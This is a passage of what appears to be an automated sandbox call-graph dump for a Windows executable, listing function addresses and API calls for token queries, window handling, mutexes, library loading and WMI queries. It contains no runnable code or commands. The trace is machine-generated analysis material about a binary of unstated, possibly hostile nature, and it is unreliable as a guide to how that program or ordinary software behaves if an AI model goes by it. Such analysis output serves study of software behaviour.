CloseHandle 99383->99371 99383->99390 99384 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 99384->99390 99385 11081bb0 86 API calls 99385->99390 99386 11106556 OpenProcessToken 99386->99383 99386->99390 99387 11106574 GetTokenInformation 99388 111065d8 CloseHandle 99387->99388 99387->99390 99388->99383 99389 11106100 281 API calls 99389->99390 99390->99371 99390->99378 99390->99379 99390->99380 99390->99383 99390->99384 99390->99385 99390->99386 99390->99387 99390->99388 99390->99389 99441 110f5e90 25 API calls std::_Mutex::_Mutex 99390->99441 99393 11106153 99392->99393 99394 11106148 99392->99394 99396 11106172 99393->99396 99397 111061ca GetTickCount LeaveCriticalSection 99393->99397 99395 11146450 std::_Mutex::_Mutex 21 API calls 99394->99395 99395->99393 99398 11106190 GetTickCount LeaveCriticalSection 99396->99398 99442 11029450 265 API calls 2 library calls 99396->99442 99399 111061f0 EnterCriticalSection 99397->99399 99400 111061e2 99397->99400 99402 111061b3 99398->99402 99403 111061a8 99398->99403 99405 11106219 99399->99405 99404 11146450 std::_Mutex::_Mutex 21 API calls 99400->99404 99402->99352 99407 11146450 std::_Mutex::_Mutex 21 API calls 99403->99407 99408 111061ed 99404->99408 99409 11106223 99405->99409 99410 11106244 99405->99410 99407->99402 99408->99399 99411 111062be LeaveCriticalSection 99409->99411 99412 1110622e 99409->99412 99413 1110f420 std::_Mutex::_Mutex 265 API calls 99410->99413 99411->99352 99443 11029450 265 API calls 2 library calls 99412->99443 99415 1110624e 99413->99415 99417 11106267 99415->99417 99444 110f0cf0 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 99415->99444 99420 11106274 99417->99420 99421 1110628b 99417->99421 99418 111062bb 99418->99411 99445 11029450 265 API calls 2 library calls 99420->99445 99446 110ebfb0 268 API calls 4 library calls 99421->99446 99424 111062a0 99447 11148f50 67 API calls std::ios_base::_Tidy 99424->99447 99427 111062af 99428 11146450 std::_Mutex::_Mutex 21 API calls 99427->99428 99428->99418 99429->99357 99431 11025d0e GetProcAddress 99430->99431 99432 11025d1f 99430->99432 99431->99432 99433 11025d38 99432->99433 99434 11025d2c K32GetProcessImageFileNameA 99432->99434 99436 11025d3e GetProcAddress 99433->99436 99437 11025d4f 99433->99437 99434->99433 99435 11025d71 99434->99435 99435->99390 99436->99437 99438 11025d56 99437->99438 99439 11025d67 SetLastError 99437->99439 99438->99390 99439->99435 99440->99359 99441->99390 99444->99417 99446->99424 99447->99427 99448 110173f0 GetTickCount 99455 11017300 99448->99455 99453 11146450 std::_Mutex::_Mutex 21 API calls 99454 11017437 99453->99454 99456 11017320 99455->99456 99463 110173d6 99455->99463 99458 11017342 CoInitialize _GetRawWMIStringW 99456->99458 99461 11017339 WaitForSingleObject 99456->99461 99457 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99460 110173e5 99457->99460 99459 110173c2 99458->99459 99464 11017375 99458->99464 99462 110173d0 CoUninitialize 99459->99462 99459->99463 99468 11017220 99460->99468 99461->99458 99462->99463 99463->99457 99464->99459 99465 110173bc 99464->99465 99467 11163a2d std::_Mutex::_Mutex 79 API calls 99464->99467 99481 11163837 67 API calls __fassign 99465->99481 99467->99464 99469 11017240 99468->99469 99470 110172e6 99468->99470 99472 11017258 CoInitialize _GetRawWMIStringW 99469->99472 99473 1101724f WaitForSingleObject 99469->99473 99471 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99470->99471 99475 110172f5 SetEvent GetTickCount 99471->99475 99474 110172d2 99472->99474 99478 1101728b 99472->99478 99473->99472 99474->99470 99476 110172e0 CoUninitialize 99474->99476 99475->99453 99476->99470 99477 110172cc 99482 11163837 67 API calls __fassign 99477->99482 99478->99474 99478->99477 99480 11163a2d std::_Mutex::_Mutex 79 API calls 99478->99480 99480->99478 99481->99459 99482->99474 99483 11025cd0 LoadLibraryA 99484 1113cd60 99485 1113cd69 99484->99485 99486 1113cd6e 99484->99486 99488 11139090 99485->99488 99489 111390d2 99488->99489 99490 111390c7 GetCurrentThreadId 99488->99490 99491 111390e0 99489->99491 99622 11029330 99489->99622 99490->99489 99629 11133920 99491->99629 99497 111391d1 99503 11139202 FindWindowA 99497->99503 99507 1113929a 99497->99507 99498 1113975a 99499 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99498->99499 99501 11139772 99499->99501 99501->99486 99502 1113911c IsWindow IsWindowVisible 99504 11146450 std::_Mutex::_Mutex 21 API calls 99502->99504 99505 11139217 IsWindowVisible 99503->99505 99503->99507 99509 11139147 99504->99509 99506 1113921e 99505->99506 99505->99507 99506->99507 99514 11138c30 392 API calls 99506->99514 99508 111392bf 99507->99508 99510 1105dd10 79 API calls 99507->99510 99511 11139470 99508->99511 99515 1105dd10 79 API calls 99508->99515 99512 1105dd10 79 API calls 99509->99512 99533 111392e7 99510->99533 99513 1113948a 99511->99513 99517 11138c30 392 API calls 99511->99517 99516 11139163 IsWindowVisible 99512->99516 99519 111394a7 99513->99519 99865 1106b860 298 API calls 99513->99865 99518 1113923f IsWindowVisible 99514->99518 99520 1113945f 99515->99520 99516->99497 99521 11139171 99516->99521 99517->99513 99518->99507 99522 1113924e IsIconic 99518->99522 99866 1112ce90 12 API calls 2 library calls 99519->99866 99520->99511 99525 11139464 99520->99525 99521->99497 99526 11139179 99521->99526 99522->99507 99528 1113925f GetForegroundWindow 99522->99528 99864 1102cff0 294 API calls std::_Mutex::_Mutex 99525->99864 99527 11146450 std::_Mutex::_Mutex 21 API calls 99526->99527 99531 11139183 GetForegroundWindow 99527->99531 99862 11131210 147 API calls 99528->99862 99529 111394ac 99535 111394b4 99529->99535 99536 111394bd 99529->99536 99538 11139192 EnableWindow 99531->99538 99539 111391be 99531->99539 99533->99508 99534 11139334 99533->99534 99541 11081a70 IsDBCSLeadByte 99533->99541 99543 11143230 std::_Mutex::_Mutex 8 API calls 99534->99543 99867 11131b00 89 API calls 2 library calls 99535->99867 99544 111394d4 99536->99544 99545 111394c8 99536->99545 99537 1113946b 99537->99511 99860 11131210 147 API calls 99538->99860 99539->99497 99555 111391ca SetForegroundWindow 99539->99555 99540 1113926e 99863 11131210 147 API calls 99540->99863 99541->99534 99550 11139346 99543->99550 99869 111317a0 299 API calls std::_Mutex::_Mutex 99544->99869 99551 111394d9 99545->99551 99868 11131870 299 API calls std::_Mutex::_Mutex 99545->99868 99549 111394ba 99549->99536 99557 11139353 GetLastError 99550->99557 99567 11139361 99550->99567 99553 111394d2 99551->99553 99554 111395e9 99551->99554 99552 111391a9 99861 11131210 147 API calls 99552->99861 99553->99551 99564 111394f1 99553->99564 99566 1113959b 99553->99566 99561 111386b0 295 API calls 99554->99561 99555->99497 99556 11139275 99562 1113928b EnableWindow 99556->99562 99565 11139284 SetForegroundWindow 99556->99565 99559 11146450 std::_Mutex::_Mutex 21 API calls 99557->99559 99559->99567 99581 111395ee 99561->99581 99562->99507 99563 111391b0 EnableWindow 99563->99539 99564->99554 99571 1110f420 std::_Mutex::_Mutex 265 API calls 99564->99571 99565->99562 99566->99554 99877 1103f000 68 API calls 99566->99877 99567->99508 99570 111393b2 99567->99570 99574 11081a70 IsDBCSLeadByte 99567->99574 99568 11139615 99578 1105dd10 79 API calls 99568->99578 99621 1113973a std::ios_base::_Tidy 99568->99621 99576 11143230 std::_Mutex::_Mutex 8 API calls 99570->99576 99575 11139512 99571->99575 99572 111395aa 99878 1103f040 68 API calls 99572->99878 99574->99570 99579 11139533 99575->99579 99870 110573b0 308 API calls std::_Mutex::_Mutex 99575->99870 99580 111393c4 99576->99580 99577 111395b5 99879 1103f060 68 API calls 99577->99879 99595 11139645 99578->99595 99871 1110f260 InterlockedIncrement 99579->99871 99580->99508 99584 111393cb GetLastError 99580->99584 99581->99568 99776 11142210 99581->99776 99587 11146450 std::_Mutex::_Mutex 21 API calls 99584->99587 99586 111395c0 99880 1103f020 68 API calls 99586->99880 99587->99508 99589 11139558 99872 1104ce00 993 API calls 99589->99872 99592 111395cb 99881 1110f270 InterlockedDecrement 99592->99881 99593 11139563 99873 1104e340 993 API calls 99593->99873 99596 1113968d 99595->99596 99599 1113966a 99595->99599 99600 11139699 GetTickCount 99595->99600 99595->99621 99596->99600 99596->99621 99598 11139599 99598->99554 99602 11146450 std::_Mutex::_Mutex 21 API calls 99599->99602 99603 111396ab 99600->99603 99600->99621 99601 1113956e 99874 1104e3b0 993 API calls 99601->99874 99605 11139675 GetTickCount 99602->99605 99606 11142e80 145 API calls 99603->99606 99605->99621 99607 111396b7 99606->99607 99609 11146ee0 269 API calls 99607->99609 99608 11139579 99875 1104ce40 993 API calls 99608->99875 99611 111396c2 99609->99611 99613 11142e80 145 API calls 99611->99613 99612 11139584 99612->99554 99876 110ebf30 285 API calls 99612->99876 99614 111396d5 99613->99614 99882 11025bb0 LoadLibraryA 99614->99882 99617 111396e2 99617->99617 99883 1112c7a0 GetProcAddress SetLastError 99617->99883 99619 11139729 99620 11139733 FreeLibrary 99619->99620 99619->99621 99620->99621 99621->99498 99884 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 99622->99884 99624 1102933e 99625 11029353 99624->99625 99885 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 99624->99885 99886 11089cc0 269 API calls 2 library calls 99625->99886 99628 1102935e 99628->99491 99630 11133962 99629->99630 99631 11133c84 99629->99631 99633 1105dd10 79 API calls 99630->99633 99632 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99631->99632 99634 11133c9c 99632->99634 99635 11133982 99633->99635 99677 11133400 99634->99677 99635->99631 99636 1113398a GetLocalTime 99635->99636 99637 111339c1 LoadLibraryA 99636->99637 99638 111339a0 99636->99638 99887 110098c0 LoadLibraryA 99637->99887 99639 11146450 std::_Mutex::_Mutex 21 API calls 99638->99639 99641 111339b5 99639->99641 99641->99637 99642 11133a15 99888 11015c30 LoadLibraryA 99642->99888 99644 11133a20 GetCurrentProcess 99645 11133a45 GetProcAddress 99644->99645 99646 11133a5d GetProcessHandleCount 99644->99646 99645->99646 99647 11133a66 SetLastError 99645->99647 99648 11133a6e 99646->99648 99647->99648 99649 11133a92 99648->99649 99650 11133a78 GetProcAddress 99648->99650 99652 11133aa0 GetProcAddress 99649->99652 99653 11133aba 99649->99653 99650->99649 99651 11133ac7 SetLastError 99650->99651 99651->99652 99652->99653 99654 11133ad4 SetLastError 99652->99654 99655 11133adf GetProcAddress 99653->99655 99654->99655 99656 11133af1 K32GetProcessMemoryInfo 99655->99656 99657 11133aff SetLastError 99655->99657 99658 11133b07 99656->99658 99657->99658 99659 11146450 std::_Mutex::_Mutex 21 API calls 99658->99659 99663 11133b7d 99658->99663 99659->99663 99660 11133c5a 99661 11133c6a FreeLibrary 99660->99661 99662 11133c6d 99660->99662 99661->99662 99664 11133c77 FreeLibrary 99662->99664 99665 11133c7a 99662->99665 99663->99660 99667 1105dd10 79 API calls 99663->99667 99664->99665 99665->99631 99666 11133c81 FreeLibrary 99665->99666 99666->99631 99668 11133bce 99667->99668 99669 1105dd10 79 API calls 99668->99669 99670 11133bf6 99669->99670 99671 1105dd10 79 API calls 99670->99671 99672 11133c1d 99671->99672 99673 1105dd10 79 API calls 99672->99673 99674 11133c44 99673->99674 99674->99660 99675 11133c55 99674->99675 99889 11027780 265 API calls 2 library calls 99675->99889 99679 1113342d 99677->99679 99678 111338e9 99678->99497 99678->99498 99780 11138c30 99678->99780 99679->99678 99680 110d1550 268 API calls 99679->99680 99681 1113348e 99680->99681 99682 110d1550 268 API calls 99681->99682 99683 11133499 99682->99683 99684 111334c7 99683->99684 99685 111334de 99683->99685 99890 11029450 265 API calls 2 library calls 99684->99890 99687 11146450 std::_Mutex::_Mutex 21 API calls 99685->99687 99689 111334ec 99687->99689 99891 110d12e0 265 API calls 99689->99891 99777 1114221a 99776->99777 99779 1114222f 99776->99779 99892 11141890 99777->99892 99779->99568 99783 11138c4d 99780->99783 99838 1113906f 99780->99838 99781 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99782 1113907e 99781->99782 99782->99502 99784 111450a0 std::_Mutex::_Mutex 90 API calls 99783->99784 99783->99838 99785 11138c8c 99784->99785 99786 1105dd10 79 API calls 99785->99786 99785->99838 99787 11138cbb 99786->99787 100028 1112c920 99787->100028 99789 11138dab 99790 11138e00 PostMessageA 99789->99790 99791 1105dd10 79 API calls 99789->99791 99792 11138e15 99790->99792 99793 11138dfc 99791->99793 99794 11138e25 99792->99794 100037 1110f270 InterlockedDecrement 99792->100037 99793->99790 99793->99792 99796 11138e2b 99794->99796 99797 11138e4d 99794->99797 99799 11138e83 std::ios_base::_Tidy 99796->99799 99800 11138e9e 99796->99800 100038 11130410 315 API calls std::_Mutex::_Mutex 99797->100038 99808 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99799->99808 99804 11142e80 145 API calls 99800->99804 99801 11138e55 100039 11146ec0 267 API calls 99801->100039 99806 11138ea3 99804->99806 99805 11138e5f 100040 1112cb20 SetDlgItemTextA 99805->100040 99809 11146ee0 269 API calls 99806->99809 99812 11138e9a 99808->99812 99810 11138eaa SetWindowTextA 99809->99810 99813 11138ec6 99810->99813 99820 11138ecd std::ios_base::_Tidy 99810->99820 99811 11138e70 std::ios_base::_Tidy 99811->99796 99812->99502 100041 111352b0 299 API calls 5 library calls 99813->100041 99814 11145b40 271 API calls 99814->99789 99816 11138f24 99817 11138f38 99816->99817 99818 11138ffc 99816->99818 99821 11138f5c 99817->99821 100044 111352b0 299 API calls 5 library calls 99817->100044 99823 1113901d 99818->99823 99828 1113900b 99818->99828 99829 11139004 99818->99829 99819 11138ef7 99819->99816 99824 11138f0c 99819->99824 99820->99816 99820->99819 100042 111352b0 299 API calls 5 library calls 99820->100042 100046 110f8640 86 API calls 99821->100046 100050 110f8640 86 API calls 99823->100050 100043 11131210 147 API calls 99824->100043 100049 11131210 147 API calls 99828->100049 100048 111352b0 299 API calls 5 library calls 99829->100048 99830 11138f1c 99830->99816 99833 11139028 99833->99838 99839 1113902c IsWindowVisible 99833->99839 99834 11138f67 99834->99838 99840 11138f6f IsWindowVisible 99834->99840 99836 1113901a 99836->99823 99837 11138f46 99837->99821 99841 11138f52 99837->99841 99838->99781 99839->99838 99842 1113903e IsWindowVisible 99839->99842 99840->99838 99843 11138f86 99840->99843 100045 11131210 147 API calls 99841->100045 99842->99838 99846 1113904b EnableWindow 99842->99846 99844 111450a0 std::_Mutex::_Mutex 90 API calls 99843->99844 99847 11138f91 99844->99847 100051 11131210 147 API calls 99846->100051 99847->99838 99850 11138f9c GetForegroundWindow IsWindowVisible 99847->99850 99848 11138f59 99848->99821 99852 11138fc1 99850->99852 99853 11138fb6 EnableWindow 99850->99853 99851 11139062 EnableWindow 99851->99838 100047 11131210 147 API calls 99852->100047 99853->99852 99855 11138fc8 99856 11138fde EnableWindow 99855->99856 99857 11138fd7 SetForegroundWindow 99855->99857 99858 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99856->99858 99857->99856 99859 11138ff8 99858->99859 99859->99502 99860->99552 99861->99563 99862->99540 99863->99556 99864->99537 99865->99519 99866->99529 99867->99549 99868->99553 99869->99551 99870->99579 99871->99589 99872->99593 99873->99601 99874->99608 99875->99612 99876->99598 99877->99572 99878->99577 99879->99586 99880->99592 99881->99598 99882->99617 99883->99619 99884->99624 99885->99624 99886->99628 99887->99642 99888->99644 99889->99660 99893 111418cf 99892->99893 99944 111418c8 std::ios_base::_Tidy 99892->99944 99894 1110f420 std::_Mutex::_Mutex 265 API calls 99893->99894 99895 111418d6 99894->99895 99898 11141906 99895->99898 100019 11060f70 301 API calls std::_Mutex::_Mutex 99895->100019 99896 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99897 1114220a 99896->99897 99897->99779 99900 11061700 275 API calls 99898->99900 99901 11141942 99900->99901 99902 11141949 RegCloseKey 99901->99902 99903 11141950 std::_Mutex::_Mutex 99901->99903 99902->99903 99904 11144dc0 267 API calls 99903->99904 99905 1114196c 99904->99905 99906 11143230 std::_Mutex::_Mutex 8 API calls 99905->99906 99907 11141980 99906->99907 99908 11141997 99907->99908 99909 11062d60 330 API calls 99907->99909 99910 1110f420 std::_Mutex::_Mutex 265 API calls 99908->99910 99909->99908 99911 1114199e 99910->99911 99912 111419ba 99911->99912 100020 11060be0 293 API calls std::_Mutex::_Mutex 99911->100020 99914 1110f420 std::_Mutex::_Mutex 265 API calls 99912->99914 99915 111419d3 99914->99915 99916 111419ef 99915->99916 100021 11060be0 293 API calls std::_Mutex::_Mutex 99915->100021 99918 1110f420 std::_Mutex::_Mutex 265 API calls 99916->99918 99919 11141a08 99918->99919 99920 11141a24 99919->99920 100022 11060be0 293 API calls std::_Mutex::_Mutex 99919->100022 99922 11060760 268 API calls 99920->99922 99923 11141a4d 99922->99923 99924 11060760 268 API calls 99923->99924 99961 11141a67 99924->99961 99925 11141d95 99926 110d1550 268 API calls 99925->99926 99928 11142179 99925->99928 99929 11141db3 99926->99929 99927 110607f0 274 API calls 99927->99961 99935 11060640 69 API calls 99928->99935 99932 1105dd10 79 API calls 99929->99932 99930 11141d85 99931 11146450 std::_Mutex::_Mutex 21 API calls 99930->99931 99931->99925 99934 11141df0 99932->99934 99933 11146450 21 API calls std::_Mutex::_Mutex 99933->99961 99936 11141f3d 99934->99936 99938 11060760 268 API calls 99934->99938 99937 111421d2 99935->99937 99940 11060f40 274 API calls 99936->99940 99939 11060640 69 API calls 99937->99939 99943 11141e0e 99938->99943 99939->99944 99941 11141f59 99940->99941 100023 110679c0 298 API calls std::_Mutex::_Mutex 99941->100023 99942 111319f0 86 API calls 99942->99961 99945 110607f0 274 API calls 99943->99945 99944->99896 99953 11141e1d 99945->99953 99947 11141e52 99948 11060760 268 API calls 99947->99948 99951 11141e68 99948->99951 99949 11141f83 99952 11141fb3 EnterCriticalSection 99949->99952 99963 11141f87 99949->99963 99950 11146450 std::_Mutex::_Mutex 21 API calls 99950->99953 99955 110607f0 274 API calls 99951->99955 99956 11060420 271 API calls 99952->99956 99953->99947 99953->99950 99954 110607f0 274 API calls 99953->99954 99954->99953 99973 11141e78 99955->99973 99957 11141fd0 99956->99957 99959 11060f40 274 API calls 99957->99959 99964 11141fe6 99959->99964 99960 11081bb0 86 API calls 99960->99961 99961->99925 99961->99927 99961->99930 99961->99933 99961->99942 99961->99960 99967 11081c60 86 API calls std::_Mutex::_Mutex 99961->99967 99962 11141eb1 99965 11060760 268 API calls 99962->99965 99963->99952 100024 110508e0 365 API calls 4 library calls 99963->100024 100025 110679c0 298 API calls std::_Mutex::_Mutex 99963->100025 99966 11141ffa LeaveCriticalSection 99964->99966 99971 1102a9f0 283 API calls 99964->99971 99969 11141ec7 99965->99969 99972 1114200e 99966->99972 100005 1114204e 99966->100005 99967->99961 99968 11146450 std::_Mutex::_Mutex 21 API calls 99968->99973 99970 110607f0 274 API calls 99969->99970 99988 11141ed6 99970->99988 99975 11141ff7 99971->99975 99980 11146450 std::_Mutex::_Mutex 21 API calls 99972->99980 99972->100005 99973->99962 99973->99968 99977 110607f0 274 API calls 99973->99977 99975->99966 99976 11133400 273 API calls 99979 11142058 99976->99979 99977->99973 99978 11141f11 99982 11060640 69 API calls 99978->99982 99981 110d1550 268 API calls 99979->99981 99983 1114201c 99980->99983 99985 11142066 99981->99985 99986 11141f1f 99982->99986 99987 1113cc30 311 API calls 99983->99987 99984 11146450 std::_Mutex::_Mutex 21 API calls 99984->99988 100026 110cff20 265 API calls std::_Mutex::_Mutex 99985->100026 99990 11142021 99987->99990 99988->99978 99988->99984 99991 110607f0 274 API calls 99988->99991 99993 111414a0 1696 API calls 99990->99993 99991->99988 100005->99976 100019->99898 100020->99912 100021->99916 100022->99920 100023->99949 100024->99963 100025->99963 100030 1112c93c 100028->100030 100029 1112c977 100052 1106b860 298 API calls 100029->100052 100030->100029 100031 1112c964 100030->100031 100033 11146ee0 269 API calls 100031->100033 100035 1112c96f 100033->100035 100034 1112c9c3 100034->99789 100034->99814 100035->100034 100036 11142290 std::_Mutex::_Mutex 265 API calls 100035->100036 100036->100034 100037->99794 100038->99801 100039->99805 100040->99811 100041->99820 100042->99819 100043->99830 100044->99837 100045->99848 100046->99834 100047->99855 100048->99828 100049->99836 100050->99833 100051->99851 100052->100035 100053 11144200 100054 11144211 100053->100054 100067 11143c20 100054->100067 100058 11144295 100061 111442b2 100058->100061 100063 11144294 100058->100063 100059 1114425b 100060 11144262 ResetEvent 100059->100060 100075 11143de0 265 API calls 2 library calls 100060->100075 100063->100058 100076 11143de0 265 API calls 2 library calls 100063->100076 100064 11144276 SetEvent WaitForMultipleObjects 100064->100060 100064->100063 100066 111442af 100066->100061 100068 11143c2c GetCurrentProcess 100067->100068 100069 11143c4f 100067->100069 100068->100069 100070 11143c3d GetModuleFileNameA 100068->100070 100071 11143c79 WaitForMultipleObjects 100069->100071 100072 1110f420 std::_Mutex::_Mutex 263 API calls 100069->100072 100070->100069 100071->100058 100071->100059 100073 11143c6b 100072->100073 100073->100071 100077 11143570 GetModuleFileNameA 100073->100077 100075->100064 100076->100066 100078 111435f3 100077->100078 100079 111435b3 100077->100079 100082 111435ff LoadLibraryA 100078->100082 100083 11143619 GetModuleHandleA GetProcAddress 100078->100083 100080 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 100079->100080 100081 111435c1 100080->100081 100081->100078 100084 111435c8 LoadLibraryA 100081->100084 100082->100083 100085 1114360e LoadLibraryA 100082->100085 100086 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 100083->100086 100087 11143639 100083->100087 100084->100078 100085->100083 100088 11143673 10 API calls 100086->100088 100087->100088 100089 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 100088->100089 100090 111436f0 100089->100090 100090->100071 100091 1115bde0 100092 1115bdf4 100091->100092 100093 1115bdec 100091->100093 100103 111631ab 100092->100103 100096 1115be14 100097 1115bf40 100099 11162be5 _free 66 API calls 100097->100099 100100 1115bf68 100099->100100 100101 1115be31 100101->100097 100102 1115bf24 SetLastError 100101->100102 100102->100101 100104 11170166 _calloc 66 API calls 100103->100104 100105 111631c5 100104->100105 100106 1115be08 100105->100106 100127 111692ef 66 API calls __getptd_noexit 100105->100127 100106->100096 100106->100097 100110 1115ba20 CoInitializeSecurity CoCreateInstance 100106->100110 100108 111631d8 100108->100106 100128 111692ef 66 API calls __getptd_noexit 100108->100128 100111 1115ba95 wsprintfW SysAllocString 100110->100111 100112 1115bc14 100110->100112 100116 1115badb 100111->100116 100113 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 100112->100113 100115 1115bc40 100113->100115 100114 1115bc01 SysFreeString 100114->100112 100115->100101 100116->100114 100116->100116 100117 1115bb6c 100116->100117 100118 1115bb5a wsprintfW 100116->100118 100126 1115bbe9 100116->100126 100129 110974a0 100117->100129 100118->100117 100120 1115bb7e 100121 110974a0 266 API calls 100120->100121 100122 1115bb93 100121->100122 100134 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 100122->100134 100124 1115bbd7 100135 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 100124->100135 100126->100114 100127->100108 100128->100106 100130 1110f420 std::_Mutex::_Mutex 265 API calls 100129->100130 100131 110974d3 100130->100131 100132 110974e6 SysAllocString 100131->100132 100133 11097504 100131->100133 100132->100133 100133->100120 100134->100124 100135->100126 100136 6c5f5ae6 100137 6c5f5af6 100136->100137 100138 6c5f5af1 100136->100138 100142 6c5f59f0 100137->100142 100150 6c5ff28f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 100138->100150 100141 6c5f5b04 100143 6c5f59fc type_info::_Type_info_dtor 100142->100143 100147 6c5f5a99 type_info::_Type_info_dtor 100143->100147 100148 6c5f5a49 ___DllMainCRTStartup 100143->100148 100151 6c5f588c 100143->100151 100145 6c5f5a79 100146 6c5f588c __CRT_INIT@12 144 API calls 100145->100146 100145->100147 100146->100147 100147->100141 100148->100145 100148->100147 100149 6c5f588c __CRT_INIT@12 144 API calls 100148->100149 100149->100145 100150->100137 100152 6c5f5898 type_info::_Type_info_dtor 100151->100152 100153 6c5f591a 100152->100153 100154 6c5f58a0 100152->100154 100156 6c5f597b 100153->100156 100157 6c5f5920 100153->100157 100201 6c5f607f HeapCreate 100154->100201 100158 6c5f59d9 100156->100158 100159 6c5f5980 100156->100159 100163 6c5f593e 100157->100163 100171 6c5f58a9 type_info::_Type_info_dtor 100157->100171 100211 6c5f5e35 61 API calls _doexit 100157->100211 100158->100171 100218 6c5f70ad 74 API calls __freefls@4 100158->100218 100216 6c5f6da9 TlsGetValue DecodePointer TlsSetValue 100159->100216 100160 6c5f58a5 100162 6c5f58b0 100160->100162 100160->100171 100202 6c5f7127 80 API calls 3 library calls 100162->100202 100168 6c5f5952 100163->100168 100212 6c5f9b09 62 API calls _free 100163->100212 100165 6c5f5985 __calloc_crt 100170 6c5f599d DecodePointer 100165->100170 100165->100171 100215 6c5f5965 65 API calls __mtterm 100168->100215 100175 6c5f59b2 100170->100175 100171->100148 100172 6c5f58b5 __RTC_Initialize 100182 6c5f58c5 GetCommandLineA 100172->100182 100194 6c5f58b9 100172->100194 100174 6c5f5948 100213 6c5f6dfa 65 API calls _free 100174->100213 100178 6c5f59cd 100175->100178 100179 6c5f59b6 100175->100179 100184 6c5f1bfd _free 61 API calls 100178->100184 100217 6c5f6e37 61 API calls 4 library calls 100179->100217 100180 6c5f58be 100180->100171 100181 6c5f594d 100214 6c5f609d HeapDestroy 100181->100214 100204 6c5ff016 67 API calls _free 100182->100204 100184->100171 100187 6c5f58d5 100205 6c5f98c4 9 API calls 100187->100205 100188 6c5f59bd GetCurrentThreadId 100188->100171 100190 6c5f58df 100191 6c5f58e3 100190->100191 100207 6c5fef5b 83 API calls 2 library calls 100190->100207 100206 6c5f6dfa 65 API calls _free 100191->100206 100203 6c5f609d HeapDestroy 100194->100203 100195 6c5f58ef 100196 6c5f5903 100195->100196 100208 6c5fecd4 83 API calls 5 library calls 100195->100208 100196->100180 100210 6c5f9b09 62 API calls _free 100196->100210 100199 6c5f58f8 100199->100196 100209 6c5f5c32 74 API calls 4 library calls 100199->100209 100201->100160 100202->100172 100203->100180 100204->100187 100205->100190 100206->100194 100207->100195 100208->100199 100209->100196 100210->100191 100211->100163 100212->100174 100213->100181 100214->100168 100215->100171 100216->100165 100217->100188 100218->100171 100219 110304b8 100220 11142a60 267 API calls 100219->100220 100221 110304c6 100220->100221 100222 11142bb0 86 API calls 100221->100222 100223 11030503 100222->100223 100224 11030518 100223->100224 100225 11081bb0 86 API calls 100223->100225 100226 110ed1a0 8 API calls 100224->100226 100225->100224 100227 1103053f 100226->100227 100228 11030589 100227->100228 100291 110ed250 81 API calls 2 library calls 100227->100291 100231 11142bb0 86 API calls 100228->100231 100230 11030554 100292 110ed250 81 API calls 2 library calls 100230->100292 100233 110305a0 100231->100233 100235 1110f420 std::_Mutex::_Mutex 265 API calls 100233->100235 100234 1103056b 100234->100228 100236 111463d0 19 API calls 100234->100236 100237 110305af 100235->100237 100236->100228 100238 110305d0 100237->100238 100293 11088860 268 API calls 100237->100293 100270 1108a470 100238->100270 100241 110305e3 OpenMutexA 100242 11030603 CreateMutexA 100241->100242 100243 1103071a CloseHandle 100241->100243 100245 11030623 100242->100245 100244 1108a570 69 API calls 100243->100244 100248 11030730 100244->100248 100246 1110f420 std::_Mutex::_Mutex 265 API calls 100245->100246 100247 11030638 100246->100247 100249 1103065b 100247->100249 100294 11060be0 293 API calls std::_Mutex::_Mutex 100247->100294 100251 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 100248->100251 100281 11015c30 LoadLibraryA 100249->100281 100252 110310b3 100251->100252 100254 1103066d 100255 111450a0 std::_Mutex::_Mutex 90 API calls 100254->100255 100256 1103067c 100255->100256 100257 11030689 100256->100257 100258 1103069c 100256->100258 100282 11145ae0 100257->100282 100259 110306a6 GetProcAddress 100258->100259 100260 11030690 100258->100260 100259->100260 100262 110306c0 SetLastError 100259->100262 100263 110281a0 47 API calls 100260->100263 100262->100260 100264 110306cd 100263->100264 100295 110092f0 428 API calls std::_Mutex::_Mutex 100264->100295 100266 110306dc 100267 110306f0 WaitForSingleObject 100266->100267 100267->100267 100268 11030702 CloseHandle 100267->100268 100268->100243 100269 11030713 FreeLibrary 100268->100269 100269->100243 100271 1110f420 std::_Mutex::_Mutex 265 API calls 100270->100271 100272 1108a4a7 100271->100272 100273 1108a4c9 InitializeCriticalSection 100272->100273 100275 1110f420 std::_Mutex::_Mutex 265 API calls 100272->100275 100277 1108a52a 100273->100277 100276 1108a4c2 100275->100276 100276->100273 100296 1116219a 66 API calls std::exception::_Copy_str 100276->100296 100277->100241 100279 1108a4f9 100297 111625f1 RaiseException 100279->100297 100281->100254 100283 111450a0 std::_Mutex::_Mutex 90 API calls 100282->100283 100284 11145af2 100283->100284 100285 11145b30 100284->100285 100286 11145af9 LoadLibraryA 100284->100286 100285->100260 100287 11145b2a 100286->100287 100288 11145b0b GetProcAddress 100286->100288 100287->100260 100289 11145b23 FreeLibrary 100288->100289 100290 11145b1b 100288->100290 100289->100287 100290->100289 100291->100230 100292->100234 100293->100238 100294->100249 100295->100266 100296->100279 